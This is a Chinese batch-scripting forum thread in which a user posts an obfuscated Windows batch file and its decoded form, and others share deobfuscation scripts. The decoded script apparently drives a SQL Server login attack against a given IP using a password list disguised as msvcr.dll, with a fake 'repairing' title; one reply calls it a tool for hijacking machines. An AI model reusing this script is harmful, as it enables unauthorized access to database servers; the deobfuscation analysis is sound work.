变量加密批处理我来解密大家来看看我解密错误没？

929289045 · 发表于 2012-6-15 11:19:30

加密的样子

@shift
@%comspec:~-1%%userprofile:~5,1%h%appdata:~-7,1% %appdata:~-7,1%%programfiles:~-5,1%%programfiles:~-5,1%
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% %comspec:~-13,1%%userprofile:~5,1%%appdata:~-7,1%%appdata:~-15,1%%userprofile:~6,1%=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
%tcopu:~32,1%%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %appdata:~-7,1%%tcopu:~11,1%%tcopu:~11,1%
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% IP=%1
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% USER=%2
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% PASS=%3
%userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%appdata:~-7,1%%programfiles:~4,1% %userprofile:~5,1%
T%programfiles:~-4,1%%comspec:~-13,1%%appdata:~-13,1%%comspec:~-1% %a% 正在修复中~~
%appdata:~7,1%%appdata:~-7,1%%appdata:~15,1%%comspec:~-1% %userprofile:~5,1%%appdata:~-7,1%%userprofile:~14,1%: %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%comspec:~-16,1%=%comspec:~-9,1%%tcopu:~17,1% %appdata:~-13,1%%programfiles:~-4,1%%userprofile:~14,1%%comspec:~-1%%comspec:~-16,1%=%tcopu:~16,1%
%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %IP% SQL
%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL账号%USER%
%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL密码%PASS%
%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %os:~5,1%%os:~5,1%%os:~5,1%.%tcopu:~21,1%%tcopu:~23,1%%tcopu:~21,1%%tcopu:~23,1%%comspec:~-13,1%%comspec:~-13,1%.%userprofile:~5,1%%appdata:~-7,1%%appdata:~7,1%
%comspec:~-16,1%%tcopu:~6,1%%appdata:~-13,1%.%comspec:~-1%%comspec:~-2,1%%comspec:~-1% -S %IP% -U %USER% -P %PASS% <%appdata:~7,1%%comspec:~-16,1%%tcopu:~8,1%%userprofile:~5,1%%programfiles:~4,1%.%appdata:~15,1%%appdata:~-13,1%%appdata:~-13,1% -%userprofile:~14,1% -%appdata:~-13,1% %tcopu:~14,1% -%comspec:~-13,1% %tcopu:~23,1% -%appdata:~-7,1% %appdata:~-7,1%%tcopu:~5,1%\%IP%.%comspec:~-13,1%%comspec:~-2,1%%comspec:~-13,1%
%comspec:~-1%%comspec:~-2,1%%programfiles:~-4,1%%comspec:~-13,1%

复制代码

我解密出来的

@shift
@echo oFF
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
@echo off
set IP=%1
set USER=%2
set PASS=%3
color c
Title %a% 正在修复中~~
mode con: cols=20 lines=5
echo %IP% SQL
echo SQL账号%USER%
echo SQL密码%PASS%
sql.exe -S %IP% -U %USER% -P %PASS% <msvcr.dll -n -l 4 -t 8 -o ok\%IP%.txt
exit

复制代码

但是我感觉不对求高手解密出来看看

929289045 · 发表于 2012-6-15 11:29:53

怎么没人啊

CrLf · 发表于 2012-6-15 12:29:38

本帖最后由 CrLf 于 2012-6-15 22:34 编辑

吐槽一下，引用环境变量来进行变量加密时完全不考虑通用性的行为，只能单机娱乐，变量环境稍有不同，解密后的结果将不完整。
解密代码，抗干扰能力弱爆了：

@echo off&setlocal enabledelayedexpansion
(for /f "delims="eol^= %%a in ('findstr /n . %1') do (
set /p str=
call set "str=!str!"
echo !str:%%=%%%%!
for /f "tokens=1*"eol^= %%b in ("!str!") do (
if /i %%b==set set %%c
)
))<%1
pause

复制代码

只能解密出框架，因为无法区分用于加密的变量与实际意图而引用的 %str% 变量，也无法预知实际运行时才会发生的变量变更

forfiles · 发表于 2012-6-15 18:10:36

你用的是这个代码解密的吗？
http://www.bathome.net/thread-7204-1-1.html

CrLf · 发表于 2012-6-15 18:43:06

用 cmd /c 代替 call 以避免空变量被处理为空...但仍无法预知程序运行时对变量的动态影响：

@echo off&setlocal enabledelayedexpansion
(for /f "delims="eol^= %%a in ('findstr /n . %1') do (
set str=
set /p str=
for /f "delims="eol^= %%b in ('echo ^"!str:"=""!"') do (
setlocal disabledelayedexpansion
echo:%%~b>$
endlocal&set str=
set /p str=<$
)
set "str=!str:""="!"
echo:!str!
for /f "tokens=1*" %%b in ("!str!") do (
if /i %%b==set call set %%c
)
))<%1
del $>nul
pause

复制代码

tz_being · 发表于 2012-6-17 09:31:56

据试验，5楼的解密代码和另一个帖子netbenton的解密代码都不行，我用另外的方法解密出的内容与楼主是相同的，只是楼主少了一句“echo www.1818tt.com”

forfiles · 发表于 2012-6-17 21:41:09

回复 6# tz_being

解密代码贴出来看看吧

小秋秋 · 发表于 2012-10-25 14:14:28

我汗这是抓鸡的吧

		自动登录	找回密码
密码			注册

[新手上路]批处理新手入门导读	[视频教程]批处理基础视频教程	[视频教程]VBS基础视频教程	[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动	[批处理精品]CMD命令50条不能说的秘密	[在线下载]第三方命令行工具	[在线帮助]VBScript / JScript 在线参考

[其他] 变量加密批处理我来解密大家来看看我解密错误没？

浏览过的版块